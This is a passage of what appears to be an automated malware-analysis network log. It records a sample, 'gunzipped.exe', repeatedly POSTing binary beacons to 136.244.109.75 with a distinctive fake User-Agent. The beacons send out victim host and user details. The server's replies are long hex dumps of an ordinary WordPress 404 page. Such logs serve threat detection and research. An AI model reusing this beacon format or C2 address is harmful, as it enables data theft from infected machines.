{"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:28.323060989 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:28.323101044 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:28.323139906 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:28.323180914 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:28.323218107 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:28.323257923 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:28.323297024 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:28.323335886 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:28.323379040 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49736	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:28.661124945 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:28.864821911 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:29.769164085 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:28 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:29.769228935 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:29.769268990 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:29.769309998 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:29.769352913 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:29.769392967 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:29.769438028 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:29.769483089 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:29.769526958 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:29.769985914 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49737	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:30.128575087 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:30.332182884 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:31.356720924 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:30 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:31.356765985 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:31.356803894 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:31.356844902 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
